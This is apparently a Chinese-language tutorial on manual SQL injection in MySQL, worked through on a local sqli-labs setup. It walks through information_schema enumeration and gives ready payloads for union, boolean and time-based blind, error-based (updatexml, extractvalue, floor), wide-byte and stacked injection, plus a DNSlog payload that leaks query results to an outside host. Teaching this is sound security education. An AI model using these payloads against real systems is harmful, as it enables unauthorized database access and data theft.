基础Web漏洞-SQL注入入门(手工注入篇)

时间:2023-12-30 12:39:26

一.什么是SQL注入

 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。本笔记环境为MySQL数据库。

二.MySQL基本增删查改语法

  • 创建与删除数据库

    语法规则

    创建:CREATE DATABASE database_name

    删除:DROP DATABASE database_name
  • 创建与删除表

    语法规则

    创建表:
CREATE TABLE table_name(
#字段1 数据类型,
name VARCHAR(20),
id INT(8)
);
  • 插入数据

    语法规则:INSERT INTO table_name (name,id) VALUES('张三',1);
  • 删除数据

    语法规则:DELETE FROM table_name WHERE id=1;
  • 查询语句

    语法规则:SELECT name FROM table_name WHERE id=1;

三.INFORMATION_SCHEMA库

  • information_schema数据库保存了整个Mysql中的所有信息(Mysql5.0以上),可以理解为信息数据库
  • information_schema数据库表:

    1.SCHEMATA表: 保存了Mysql数据库中所有的库名 SHOW DATABASES;的结果就是取自该表的SCHEMA_NAME

    基础Web漏洞-SQL注入入门(手工注入篇)

    基础Web漏洞-SQL注入入门(手工注入篇)

    查库 : select schema_name from information_schema.schemata;

    2.TABLES表: 提供了数据库中每一个库的所有表的名称

    查表 : select table_name from information_schema.tables where table_schema='想查表的库名';

    3.COLUMNS表: 提供了所有库的所有表的所有字段信息

    查列 : select column_name from information_schema.columns where table_name='想查字段的表名';

经过上述三个语句 已经可以查询所有的表和字段信息 就可根据查询语句查询任意信息

栗子: select password,username from security.users; (查询security库中users表中所有password和username信息)

基础Web漏洞-SQL注入入门(手工注入篇)

四.MySQL注入常用函数

  • user();/current_user(); 查询当前用户

    基础Web漏洞-SQL注入入门(手工注入篇)
  • @@basedir; 数据库安装路径 / @@datadir; 数据库路径

    基础Web漏洞-SQL注入入门(手工注入篇)
  • @@version_compile_os; 查询操作系统版本

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 字符串拼接函数

    concat , concat_ws(用字符将参数拼接起来) , group_concat

    例如:select group_concat(concat_ws('~',username,password)) from security.users;

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 字符串截取函数

    substr(从第n位开始,截取m位):select substr((selsect username from users limit 0,1),1,2);

    mid(从第n位开始,截取m位):select mid('martin',2,3);

    left(从左开始,截取n位):select left('martin',2);

    right(从右开始,截取n位):select right('martin',2);

    locate(返回第一个字符串首次出现在第二个字符出现的位置):select locate('martin','12432martin');
  • 返回ASCII字符对应的值(反向用char)

    ascii:select ascii('a');

    ord:select ord('a');

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 部分计算

    select length(database()); 当前数据库名称的长度

    count 计算数目
  • 延时函数

    select sleep(5); 延时5秒 常用于时间盲注

    if:语法if(exp1,exp2,exp3); 如果exp1为真,执行exp2,否则执行exp3
  • 常见注释
#
--+(浏览器常用)
/*/
/*!*/

五.常见的SQL注入类型

  • 字符型

基础Web漏洞-SQL注入入门(手工注入篇)

根据提示 用GET方法提交ID参数

基础Web漏洞-SQL注入入门(手工注入篇)

改变URL 发现报错

基础Web漏洞-SQL注入入门(手工注入篇)

查看源码

基础Web漏洞-SQL注入入门(手工注入篇)

构造URL:http://127.0.0.1/sqli/Less-1/?id=1' and 1 = 1 --+(1=1 正常 1=2报错)

基础Web漏洞-SQL注入入门(手工注入篇)

  • 数字型

    查看第二关源码

    基础Web漏洞-SQL注入入门(手工注入篇)

    发现与第一关不同的是 id参数数据类型发生了变化 所以构造URL

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 搜索型

    常见源码 :$sql="select * from user where password like '%$pwd%' order by password";

    若用户输入m'and 1=1 and '%'=' 则会构成注入

    源码中的语句会变成:select * from user where password like '%m'and 1=1 and '%'='%' order by password

六.常用的注入方式

  • union注入
  1. 使用order by语句进行列数的估计

    基础Web漏洞-SQL注入入门(手工注入篇)

    基础Web漏洞-SQL注入入门(手工注入篇)

    由此可以看出 列数为3列
  2. 使用union注入(union selectunion all select)

    基础Web漏洞-SQL注入入门(手工注入篇)

    根据前述数据库查询语句 查询有哪些数据库 表名 进而查询详细数据

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 布尔盲注(页面无回显,返回的只有布尔值)

    在id后加' 没有出现回显

    基础Web漏洞-SQL注入入门(手工注入篇)

    判断是否存在注入与union类似 可以使用length来猜取库名 表名长度 如下图

    基础Web漏洞-SQL注入入门(手工注入篇)

    判断出长度 使用substr来遍历出数据库名的字符

    构造:?id=1' and ascii(substr(database(),1,1))>n --+ (使用BP爆破)
  • 时间盲注 (基于Web界面响应的时间差来判断注入)

    基础Web漏洞-SQL注入入门(手工注入篇)

    看出sleep函数已经被带入后端处理了 证明存在注入

    构造URL:http://localhost/sqli/Less-9/?id=1%27%20and%20if%20(length(database())=8,sleep(5),1)--+

    基础Web漏洞-SQL注入入门(手工注入篇)

    大体步骤同布尔盲注 只是构造的函数和判断方式改变了一下
  • DNSlog盲注

    利用条件 mysql.inisecure_file_priv必须为空

    构造payload:load_file(concat('\\\\',执行的语句,'.自行注册\\abc'))--+
  • 报错注入 (公式化注入 直接插入payload)

    1)updatexml payload:?id=1' and (updatexml(1,concat(0x7e,(SQL语句),0x7e),1));--+

    基础Web漏洞-SQL注入入门(手工注入篇)

    2)extractvalue

    payload:?id=1' and (extractvalue(1,concat(0x7e,(SQL语句),0x7e)));--+

    基础Web漏洞-SQL注入入门(手工注入篇)
  1. floor

    payload:?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 宽字节注入 (gbk要两个asscii组合解码)

    特殊字符被转义 如:

    基础Web漏洞-SQL注入入门(手工注入篇)

    因为使用GBK编码 /被合并成了特殊字符

    基础Web漏洞-SQL注入入门(手工注入篇)
  • 二次注入

    将存储到数据库中的数据取出在执行 形成的注入
  • http请求头注入

    抓包修改http请求头 构成注入
  • 堆叠注入 (多条sql一起执行 可以修改数据库中的数据)

    如图 新建了一个test表目

基础Web漏洞-SQL注入入门(手工注入篇)


以上 就是一些常见的SQL注入知识点